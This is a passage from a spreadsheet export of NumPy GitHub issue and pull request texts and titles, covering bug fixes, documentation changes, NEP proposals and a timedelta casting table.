ValueError: probabilities do not sum to 1_x000D_
&gt;&gt;&gt; probs = [None, None, None]_x000D_
&gt;&gt;&gt; np.random.choice(a, p=probs)_x000D_
42_x000D_
&gt;&gt;&gt; np.random.choice(a, p=probs)_x000D_
42_x000D_
&gt;&gt;&gt; np.random.choice(a, p=probs)_x000D_
42_x000D_
```</t>
  </si>
  <si>
    <t>Passing a list of None to np.random.choice(p=[None,None,None])</t>
  </si>
  <si>
    <t>Fixes #11245_x000D_
_x000D_
PyArray_NewFromDescr sets the flags just fine by itself.</t>
  </si>
  <si>
    <t>BUG: Remove errant flag meddling in .real and .imag</t>
  </si>
  <si>
    <t>`PyArray_UpdateFlags(view, NPY_ARRAY_UPDATE_ALL);` is already called within `PyArray_NewFromDescr_int`. Note that `PyArray_NewFromDescr`  goes through `PyArray_NewFromDescr_int`, so also sets the flags.</t>
  </si>
  <si>
    <t>MAINT: Don't update the flags a second time</t>
  </si>
  <si>
    <t>Extracted from #11246</t>
  </si>
  <si>
    <t>MAINT/BUG: Remove out-of-band reference count in PyArray_Newshape, fix memory leak</t>
  </si>
  <si>
    <t>Fixes #11237._x000D_
_x000D_
&lt;s&gt;Failing on my machine, so sending to travis in the hope that warnings catch the issue.&lt;/s&gt;</t>
  </si>
  <si>
    <t>BUG: Set ndarray.base before `__array_finalize__`</t>
  </si>
  <si>
    <t>```_x000D_
&gt;&gt;&gt; np.array(1j).real.flags_x000D_
  C_CONTIGUOUS : False_x000D_
  F_CONTIGUOUS : False_x000D_
  OWNDATA : False_x000D_
  WRITEABLE : True_x000D_
  ALIGNED : True_x000D_
  UPDATEIFCOPY : False_x000D_
```_x000D_
_x000D_
Due to a pointless `PyArray_CLEARFLAGS` in `_get_part`</t>
  </si>
  <si>
    <t>BUG: 0d array is non-contiguous</t>
  </si>
  <si>
    <t>The request by @eric-wieser for more tests in #11018 keep on yielding somewhat unrelated errors. Here, an overzealous `XDECREF` on borrowed values.</t>
  </si>
  <si>
    <t>BUG: do not decref borrowed refs for extobj and axes</t>
  </si>
  <si>
    <t>Since this is now in `np.testing._private`, it's no longer usable by the outside world anyway</t>
  </si>
  <si>
    <t>MAINT: Remove dead code backporting py2.6 warnings</t>
  </si>
  <si>
    <t xml:space="preserve">A cleanup step in preparation for #11237 </t>
  </si>
  <si>
    <t>MAINT: Use PyArray_NewFromDescr where possible, remove unused definitions</t>
  </si>
  <si>
    <t>`ndarray.base` seems like it would be useful state for implementers of `__array_finalize__`:_x000D_
_x000D_
```python_x000D_
In [1]: class bad(np.ndarray):_x000D_
   ...:     def __array_finalize__(self, x):_x000D_
   ...:         print("Base is", self.base)_x000D_
   ...:_x000D_
_x000D_
In [2]: x = np.array(1).view(bad)_x000D_
Base is None_x000D_
_x000D_
In [3]: x.base_x000D_
Out[3]: array(1)_x000D_
```</t>
  </si>
  <si>
    <t>BUG: ndarray.base is not yet set in __array_finalize__, causing use-after-free</t>
  </si>
  <si>
    <t>I've noticed a few other issues and anecdotal reports of einsum being somewhat hard to grasp. I remember a while ago having those same experiences although now feel it is one of the most useful functions that I use consistently._x000D_
_x000D_
I wanted to expand the docs to make the function more understandable and likeable by first time readers, albeit I tried not to augment the current material too much so as to not step on anyones toes._x000D_
_x000D_
Also I added a part and example on where the einsum_path has been very useful for some of my optimisation routines and have increased speed by orders of magnitude.</t>
  </si>
  <si>
    <t>DOC: Update einsum docs</t>
  </si>
  <si>
    <t xml:space="preserve">fixes #11205._x000D_
Now the shape of the output matches the shape of the input, as expected._x000D_
_x000D_
Note that the implementation via `piecewise` is a bit slower (a simple test suggests it adds about 10% for a small array), but it has the benefit of being very simple and almost everybody will use the proper `ufunc` in scipy anyway, which is about 50 times faster (now added a note to the docstring to suggest that)._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: ensure i0 does not change the shape.</t>
  </si>
  <si>
    <t>Small thing missed in gh-10919.</t>
  </si>
  <si>
    <t>MAINT: ensure we do not create unnecessary tuples for outputs</t>
  </si>
  <si>
    <t>Somewhat simplifies the code inside get_single_op_view, moves logic out of the main einsum function loop, and fixes #11221.</t>
  </si>
  <si>
    <t>MAINT: More cleanup of einsum</t>
  </si>
  <si>
    <t>Somewhat delayed, please take a look at my proposal for relaxing our strict stream-compatibility policy for our RNG capabilities.</t>
  </si>
  <si>
    <t>NEP: New RNG policy</t>
  </si>
  <si>
    <t>I missed the missing suffix before merging. Lesson learned, now I tried `make html` before pushing.</t>
  </si>
  <si>
    <t>MAINT: add 'rst' to nep filename, fixup urls</t>
  </si>
  <si>
    <t>The `numpy.lib.recfunctions` module was not baked into the documentation build._x000D_
_x000D_
This PR adds it together with one minor formatting cleanup in the docstrings. Tested by building `make html` lcoally and manually inspecting the result</t>
  </si>
  <si>
    <t>DOC: add existing recfunctions documentation to output</t>
  </si>
  <si>
    <t>It is possible (we've seen instances on Windows) if people pass in np.int32 values in their shape parameter to numpy.memmap(), for those values to overflow during the multiply in the initial calculation of the "bytes" variable, for large memmaps._x000D_
_x000D_
Locally we've adjusted our code to explicitly promote all of our shapes to uint64 to avoid this; it feels more right to do this promotion inside of the memmap constructor so this can't come up (hence this PR)_x000D_
_x000D_
Possible things to think about:_x000D_
1) If there are ever platforms with even larger datatypes where gigantic memmaps are possible, this might end up demoting rather than promoting them (seems unlikely to me)_x000D_
2) If there are ever numeric datatypes that don't promote cleanly into np.uint64, or platforms where np.uint64 is not a valid type, this would break that code (not sure whether numpy is compatible with such platforms)</t>
  </si>
  <si>
    <t>BUG: Forcibly promote shape to uint64 in numpy.memmap.</t>
  </si>
  <si>
    <t>DOC: Make reference doc nditer examples python3 friendly</t>
  </si>
  <si>
    <t>Closes #10930.</t>
  </si>
  <si>
    <t>BUG: Fixes einsum broadcasting bug when optimize=True</t>
  </si>
  <si>
    <t>Fixes https://github.com/numpy/numpy/issues/11216._x000D_
_x000D_
In the appending step of `np.pad` we explicitly set the sampling size to be (at most) the original size of the array along the corresponding dimension. In case of `min` and `max` padding this problem doesn't arise, and I believe `median` padding should be safe too. I guess the code could be refactored such that statistics are only computed once when no `stat_length` is given, but I wanted to fix the original bug with minimal changes._x000D_
_x000D_
I also added `numpy/lib/tests/test_arraypad.py:test_check_mean_ignore_prepend` to test the problem, which fails in master and passes with this patch.</t>
  </si>
  <si>
    <t>BUG: Fix mean padding with np.pad so that prepended values cannot bias appended ones</t>
  </si>
  <si>
    <t>When installing numpy thru apt-get on Raspberrian Linux I am getting this error._x000D_
_x000D_
Numpy version_x000D_
_x000D_
&gt; python-numpy is already the newest version (1:1.12.1-3)._x000D_
_x000D_
_x000D_
Python version _x000D_
_x000D_
&gt; Python 2.7.13 (default, Nov 24 2017, 17:33:09)_x000D_
&gt; [GCC 6.3.0 20170516] on linux2_x000D_
&gt; _x000D_
_x000D_
Full error is._x000D_
_x000D_
&gt; ImportError:_x000D_
&gt; Importing the multiarray numpy extension module failed.  Most likely you are trying to import a failed build of numpy. If you're working with a numpy git repo, try `git clean -xdf` (removes all files not under version control).  Otherwise reinstall numpy.</t>
  </si>
  <si>
    <t>Importing the multiarray numpy extension module failed.</t>
  </si>
  <si>
    <t>['53 - Invalid', '57 - Close?', 'component: distribution']</t>
  </si>
  <si>
    <t>Also for ``__array_ufunc__`` overrides, ``sig`` and ``signature`` cannot be passed in both.  This was incorrectly coded and slipped through as it was not tested._x000D_
_x000D_
Well, at least I think that is the case. Tests will show whether it is true.</t>
  </si>
  <si>
    <t>BUG: Fix reference count/memory leak exposed by better testing</t>
  </si>
  <si>
    <t xml:space="preserve">Current [generated documentation looks like](https://docs.scipy.org/doc/numpy/reference/generated/numpy.rot90.html):_x000D_
_x000D_
![screenshot from 2018-05-31 13-11-23](https://user-images.githubusercontent.com/526577/40779153-27cffe3c-64d4-11e8-92ff-caed40db2052.png)_x000D_
_x000D_
After applying this patch:_x000D_
_x000D_
![screenshot from 2018-05-31 13-08-07](https://user-images.githubusercontent.com/526577/40779124-076f7c44-64d4-11e8-965c-571d509a36f2.png)_x000D_
</t>
  </si>
  <si>
    <t>DOC: Fix doctest formatting in `rot90()` examples</t>
  </si>
  <si>
    <t>The expression "the positive square-root" is not correct because the result might be zero. It should be "the non-negative square-root."</t>
  </si>
  <si>
    <t>DOC: change the explanation of sqrt</t>
  </si>
  <si>
    <t xml:space="preserve">`numpy.i0` squeezes the input, as in an example of the document:_x000D_
```_x000D_
&gt;&gt;&gt; np.i0([0.])_x000D_
array(1.0)_x000D_
```_x000D_
_x000D_
This is different from `scipy.special`:_x000D_
```_x000D_
&gt;&gt;&gt; special.i0([0.])_x000D_
array([1.])_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>i0 changes the shape</t>
  </si>
  <si>
    <t>Fixes #11028</t>
  </si>
  <si>
    <t>BUG: Bytes delimiter/comments in genfromtxt should be decoded</t>
  </si>
  <si>
    <t>noticed in discussion on #10370 _x000D_
_x000D_
This is a continuation of PR #9020. Note that if/when PR #11036 is accepted and changes the interface for `npy_set_floatstatus*()` this PR will need to be updated_x000D_
_x000D_
Edit: does not affect #11029 , it seems so far there is no relation</t>
  </si>
  <si>
    <t>BUG: reduce using SSE only warns if inside SSE loop</t>
  </si>
  <si>
    <t>Backport of #11036._x000D_
_x000D_
We should find a more generic and explicit way to prevent optimizing_x000D_
compilers from reordering the call to npy_get_floatstatus._x000D_
_x000D_
To reproduce the problem, clang or gcc-8.1 are required. Confirmed that_x000D_
this fixes the problem using clang-6.0</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11196 _x000D_
_x000D_
As discussed in the bug report polyfit uses a non-standard scaling factor for the covariance matrix, this is corrected. _x000D_
_x000D_
Furthermore, an option is added to disable the scaling of the covariance matrix completely. It would be useful in occasions, where the weights are given by 1/sigma with sigma being the (known) standard errors of (Gaussian distributed) data points, in which case the unscaled matrix is already a correct estimate for the covariance matrix._x000D_
</t>
  </si>
  <si>
    <t>BUG/ENH: Removed non-standard scaling of the covariance matrix and added option to disable scaling completely.</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', '56 - Needs Release Note.', '59 - Needs tests', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I (unfortunately) use LabView and found that it saves binary files including the number of data written at the beginning of the file._x000D_
_x000D_
Is it possible to add a parameter like a header dtype to extract this value or  to skip them?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>fromfile add a header dtype</t>
  </si>
  <si>
    <t>Fixes #11031 _x000D_
_x000D_
Backport of #11091</t>
  </si>
  <si>
    <t>BUG: Python2 doubles don't print correctly in interactive shell.</t>
  </si>
  <si>
    <t>Spun off of #11167._x000D_
_x000D_
I will copy my comment from there:_x000D_
_x000D_
By my reading, there is some confusion in the existing numpy code about the floating-point implementation of (apple) ppc systems. In fact, long double on ppc systems is a "ibm double-double" value, which numpy detects under the name `HAVE_LDOUBLE_DOUBLE_DOUBLE_*`. Therefore the name `HAVE_LDOUBLE_IEEE_DOUBLE_16_BYTES_BE` is superflous/duplicate, and can be replaced by `HAVE_LDOUBLE_DOUBLE_DOUBLE_BE`._x000D_
_x000D_
See asterisk here:_x000D_
https://developer.apple.com/library/content/documentation/DeveloperTools/Conceptual/LowLevelABI/100-32-bit_PowerPC_Function_Calling_Conventions/32bitPowerPC.html_x000D_
_x000D_
Furthermore, I think the treatment of  `HAVE_LDOUBLE_IEEE_DOUBLE_16_BYTES_LE` in `npy_math_private.h` is incorrect: It treats the first 8 bytes as a normal double and then completely ignores the second 8 bytes. This doesn't cause numpy to blow up because the first double of a double-double type gives the "right" value and by ignoring the second double we just lost some precision. But, the fact that we were losing precision is bad._x000D_
_x000D_
Now it seems to me we no longer need the darwin specific ifdef above, we can let the code in `setup_common.py` detect the double-double type like on other systems.</t>
  </si>
  <si>
    <t>MAINT: remove darwin hardcoded LDOUBLE detection</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: build', 'component: numpy.core']</t>
  </si>
  <si>
    <t>At the recent sprint in Berkeley, we were trying to clarify the correct place for discussing NEPs.  This is an attempt to summarize the predominant opinion of core developers.  I'm happy to update to reflect that opinion more accurately.</t>
  </si>
  <si>
    <t>DOC: Update NEP0 to clarify that discussion should happen on mailing list</t>
  </si>
  <si>
    <t>Written with Stephan Hoyer_x000D_
after discussion with Stefan Van der Walt, Charles Harris, Matti Picus, Jaime Frio and Nathaniel Smith</t>
  </si>
  <si>
    <t>NEP: Array function protocol</t>
  </si>
  <si>
    <t>['15 - Discussion', 'component: NEP']</t>
  </si>
  <si>
    <t>This matches most of the CPython API._x000D_
_x000D_
Follows on from comments in gh-11095.</t>
  </si>
  <si>
    <t>MAINT: Use the more common -1 / 0 to indicate error / success</t>
  </si>
  <si>
    <t>For development/testing purposes, it's convenient to have access to the_x000D_
system printf for floats. This is a very simple printf interface._x000D_
_x000D_
Split off from #11167</t>
  </si>
  <si>
    <t>TST: Add np.core._multiarray_tests.format_float_OSprintf_g</t>
  </si>
  <si>
    <t>Extracted from #11167</t>
  </si>
  <si>
    <t>MAINT: Add comments to long_double detection code</t>
  </si>
  <si>
    <t>This avoids the need to count the number of Fs._x000D_
_x000D_
Extracted from #11167, to reduce the number of touched lines there.</t>
  </si>
  <si>
    <t>MAINT: Add bitmask helper functions</t>
  </si>
  <si>
    <t>np.ogrid was not tested anyway, so this was not caught._x000D_
_x000D_
Missed in #9686, works toward scipy/scipy#8879</t>
  </si>
  <si>
    <t>BUG: Avoid deprecated non-tuple indexing</t>
  </si>
  <si>
    <t>This commit also adds an assert and closes gh-11088_x000D_
_x000D_
---_x000D_
Ok, the assert, its still in there with sizeof, which is probably OK here, but not right generally....</t>
  </si>
  <si>
    <t>BUG: void dtype setup checked offset not actual pointer for alignment</t>
  </si>
  <si>
    <t>Builds on #11175 to include allowing broadcasting in `gufuncs` (which now is surprisingly easy)&gt;_x000D_
_x000D_
With this, @mattharrigan's `all_equal` (#8528) would become truly useful, as it also allows things like `np.all_equal(ndarray, const, axis=?)`, i.e., one of the arguments can be broadcast over its core._x000D_
_x000D_
EDIT: has decent tests but does still need docs.</t>
  </si>
  <si>
    <t>ENH: Further expansion of gufunc signature to allow broadcasting</t>
  </si>
  <si>
    <t>['01 - Enhancement', '15 - Discussion', 'component: numpy.core', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Another split-off from #11132 - expanded signature testing.</t>
  </si>
  <si>
    <t>TST: Test dimensions/indices found from parsed gufunc signatures.</t>
  </si>
  <si>
    <t>Cherry-picked part of #11132, which is nice &amp; independent of the enhancement proposed there.</t>
  </si>
  <si>
    <t>DOC: improvement of the documentation for gufunc.</t>
  </si>
  <si>
    <t xml:space="preserve">Corrects an overzealous change in #11098 from the fixed core dimensions to the ones expanded for `keepdims=True`. Since arrays were allocated, this wrong change caused no problems, but it was not needed and confused the heck out of myself..._x000D_
_x000D_
@charris: since this is a correction to stuff slated for 1.15, I set the milestone as such._x000D_
_x000D_
cc @mattip </t>
  </si>
  <si>
    <t>MAINT: avoid setting non-existing gufunc strides for keepdims=True.</t>
  </si>
  <si>
    <t>EDIT: now the replacement of #11132_x000D_
_x000D_
An alternative to #11132, much more following its logic, but (I think) clearer. Mostly for @mattip to look at. I like the use of flags, although it may seem a bit overkill if we have just one. But I do hope to have a broadcast option (tentatively `n|1`). For now, I also kept the frozen dimensions, as those are quite easy.</t>
  </si>
  <si>
    <t xml:space="preserve"> ENH: Generalized ufunc signature expansion for frozen and flexible dimensions</t>
  </si>
  <si>
    <t>This checks for potential BLAS issues, which are useful to catch early._x000D_
_x000D_
As suggested by @charris at #11168. This may be a bit overkill, so not sure if we want this, but on the other hand this additional import-time check probably does not cost much. The additional advantage is that import-time failures will force the downstream to seriously consider addressing the issue :)</t>
  </si>
  <si>
    <t>MAINT: add sanity-checks to be run at import time</t>
  </si>
  <si>
    <t>['05 - Testing', '06 - Regression']</t>
  </si>
  <si>
    <t>To avoid it wasting a few hours of someone else's time if they edit the gufunc signature parser...._x000D_
_x000D_
cc @mattip, since he may just have suffered similar problems...</t>
  </si>
  <si>
    <t>MAINT: Ensure that parsing errors are passed on even in tests.</t>
  </si>
  <si>
    <t>Currently, numpy seems to be set up to run Appveyor via_x000D_
https://ci.appveyor.com/project/charris/numpy_x000D_
_x000D_
However, there's also a separate "project" appveyor account _x000D_
https://ci.appveyor.com/project/numpy/numpy_x000D_
I don't know the history of this, but it seems I'm able to log into this "project" account, and occasionally get redirected to it. For some reason, it's not correctly running the numpy tests however, but has a very long queue._x000D_
_x000D_
I don't have bandwidth to sort this out, but just as a notice...</t>
  </si>
  <si>
    <t>Two different Appveyor accounts?</t>
  </si>
  <si>
    <t>Add regression test that checks for certain bugs where results from sdot_x000D_
change if certain libraries are imported first._x000D_
_x000D_
This is added in case it manages to catch several of recently reported bugs_x000D_
on OSX (#8577, #11166, #10584). More libraries could be added here in addition to pyqt5, in case_x000D_
other potentially problematic imports are found.</t>
  </si>
  <si>
    <t>TST: linalg: add regression test for gh-8577</t>
  </si>
  <si>
    <t>This is split off from #10444 and contains all the dragon4 updates except the ppc float128 implementation._x000D_
_x000D_
In summary, this:_x000D_
 * adds a helper/testing function `format_float_OSprintf_g` which uses the OS printf_x000D_
 * defines binary floating-point format macros/names (eg, IEEE_binary64)_x000D_
 * removes some unneeded (I am pretty sure!) long-double detection code_x000D_
 * lots of tidying in dragon4, such as:_x000D_
    * bitmask function_x000D_
    * removal of all the big static variables_x000D_
    * reorganization of float unpacking code_x000D_
    *  make/reorganize specific funcs for each float format_x000D_
    * pass struct of options around instead of huge numbers of arguments_x000D_
_x000D_
The idea is we merge this first, than can merge the ppc commit separately.</t>
  </si>
  <si>
    <t>MAINT: Cleanup dragon4 code in various ways</t>
  </si>
  <si>
    <t>I get very very strange numerical inconsistencies like these:_x000D_
&lt;img width="789" alt="screen shot 2018-05-27 at 0 29 08" src="https://user-images.githubusercontent.com/1093567/40580834-df8b364e-6147-11e8-9b4d-4f6aa0300643.png"&gt;_x000D_
I could reproduce this in ipython and jupyter notebook but only on macOS, not on Linux. Here is a gist with [code to reproduce the error](https://gist.github.com/cod3licious/d2926e0bdc1355f0a921ac083d2799eb) (Note that you need to download and unzip a file first and then appropriately copy your value of `vec_x` to `a`.) The error also happens for `np.dot` and possibly other functions._x000D_
_x000D_
My system specs:_x000D_
macOS 10.13.4 (17E202) _x000D_
Python 3.6.4 :: Anaconda custom (64-bit)_x000D_
jupyter-notebook 5.4.0_x000D_
ipython 6.2.1_x000D_
numpy 1.14.2_x000D_
gensim 3.4.0_x000D_
_x000D_
This is a cross post from this [jupyter notebook issue](https://github.com/jupyter/notebook/issues/3641) (as I really don't know who's the culprit in the end).</t>
  </si>
  <si>
    <t>BUG: Serious numerical error/inconsistency on macOS</t>
  </si>
  <si>
    <t>Alternative to #11132 - comments to follow.</t>
  </si>
  <si>
    <t>WIP: Alternative ufunc signature expansion for flexible dimensions</t>
  </si>
  <si>
    <t>['01 - Enhancement', '15 - Discussion', '55 - Needs work', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Windows now properly supports floating point error states. Fixes #2350</t>
  </si>
  <si>
    <t>TST: windows builds now properly support floating error states</t>
  </si>
  <si>
    <t>Fixes #11115 related to #11150 _x000D_
_x000D_
Python before 2.7.7 had a broken ctypes memoryview format for multi-demensional arrays. Skip the test</t>
  </si>
  <si>
    <t>TST: Skip ctypes dependent test that fails on Python &lt; 2.7.7.</t>
  </si>
  <si>
    <t>refcount tests seem to fail on windows appveyor, try diabling GC</t>
  </si>
  <si>
    <t>TST: disable gc in refcount test</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
_x000D_
I was wondering if there any plans to implement softmax in numpy? I seem to keep having to write it for myself, and I was wondering if anyone else is in the same situation. </t>
  </si>
  <si>
    <t xml:space="preserve">Feature Request: Softmax </t>
  </si>
  <si>
    <t>['01 - Enhancement', '57 - Close?']</t>
  </si>
  <si>
    <t>Fixes gh-11154</t>
  </si>
  <si>
    <t>BUG: Prevent stackoverflow in conversion to datetime types</t>
  </si>
  <si>
    <t>The following causes a stack overflow:_x000D_
_x000D_
```python_x000D_
a = []_x000D_
b = []_x000D_
a.append(b)_x000D_
b.append(a)_x000D_
o = np.array([None])_x000D_
o[0] = a_x000D_
o.astype('m8')_x000D_
```_x000D_
_x000D_
Caused by the same functions as #11151. This has a guard against recursion, but not co-recursion</t>
  </si>
  <si>
    <t>BUG: C stack overflow on converting co-recursive list to timedelta</t>
  </si>
  <si>
    <t>It turns out that there's some unusual stuff going on in the casting rules for timedelta types_x000D_
_x000D_
https://github.com/numpy/numpy/blob/4740f15df91a779ccf2e923367a792ddcee5816e/numpy/core/src/multiarray/datetime.c#L1362-L1410_x000D_
_x000D_
Essentially, months/years and everything else are considered as separate groups of types, which cannot be cast between safely. I think this is the right choice, but I was surprised to find it._x000D_
_x000D_
Is there a good place to document this? In the meantime, I figure I may as well do so in this issue:_x000D_
_x000D_
---_x000D_
_x000D_
The below tables show the result of `can_cast(dt1, dt2, casting)` for various datetime subtypes. There's a weird boundary between days and months, which is poorly documented within the source code:_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
&lt;summary&gt;_x000D_
Script to generate this_x000D_
&lt;/summary&gt;_x000D_
_x000D_
```python_x000D_
units = np.array(['Y', 'M', 'W', 'D', 'h', 'm', 's', 'ms', 'us', 'ns', 'ps', 'fs', 'as'])_x000D_
castings = np.array(['no', 'equiv', 'safe', 'same_kind', 'unsafe'])_x000D_
it = np.nditer((*np.ix_(castings, units, units),None), op_dtypes=[None, None, None, bool])_x000D_
with it:_x000D_
	for casting, u1, u2, res in it:_x000D_
		dt1 = np.dtype('m8[{}]'.format(u1))_x000D_
		dt2 = np.dtype('m8[{}]'.format(u2))_x000D_
		res[...] = np.can_cast(dt1, dt2, casting.item())_x000D_
	res = it.operands[-1]_x000D_
_x000D_
_x000D_
def print_table(arr_2d):_x000D_
	it = iter(arr_2d)_x000D_
	line = next(it)_x000D_
	print('|{}|'.format(' | '.join(l for l in line)))_x000D_
	print('|{}|'.format(' | '.join(' --- ' for l in line)))_x000D_
	for line in it:_x000D_
		print('|{}|'.format('|'.join(l for l in line)))_x000D_
_x000D_
for res_i, casting in zip(res, castings):_x000D_
	results = np.block([_x000D_
		[                 '', units],_x000D_
		[units[:,np.newaxis], np.where(res_i, ':heavy_check_mark:', ':x:')]_x000D_
	])_x000D_
	print('## {}'.format(casting))_x000D_
	print_table(results)_x000D_
	print()_x000D_
```_x000D_
&lt;/details&gt;_x000D_
_x000D_
&lt;!-- Generated output begins --&gt;_x000D_
_x000D_
## no_x000D_
| | Y | M | W | D | h | m | s | ms | us | ns | ps | fs | as|_x000D_
| ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  --- |_x000D_
|Y|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|M|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|W|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|D|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|h|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|m|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|s|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|ms|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|_x000D_
|us|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|_x000D_
|ns|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|_x000D_
|ps|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|_x000D_
|fs|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|_x000D_
|as|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|_x000D_
_x000D_
## equiv_x000D_
| | Y | M | W | D | h | m | s | ms | us | ns | ps | fs | as|_x000D_
| ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  --- |_x000D_
|Y|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|M|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|W|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|D|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|h|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|m|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|s|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|ms|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|_x000D_
|us|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|_x000D_
|ns|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|:x:|_x000D_
|ps|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|:x:|_x000D_
|fs|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:x:|_x000D_
|as|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|_x000D_
_x000D_
## safe_x000D_
| | Y | M | W | D | h | m | s | ms | us | ns | ps | fs | as|_x000D_
| ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  --- |_x000D_
|Y|:heavy_check_mark:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|M|:x:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|W|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:x:|:x:|:x:|_x000D_
|D|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:x:|:x:|:x:|_x000D_
|h|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:x:|:x:|_x000D_
|m|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:x:|_x000D_
|s|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:x:|_x000D_
|ms|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|us|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ns|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ps|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|fs|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|as|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:heavy_check_mark:|_x000D_
_x000D_
## same_kind_x000D_
| | Y | M | W | D | h | m | s | ms | us | ns | ps | fs | as|_x000D_
| ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  --- |_x000D_
|Y|:heavy_check_mark:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
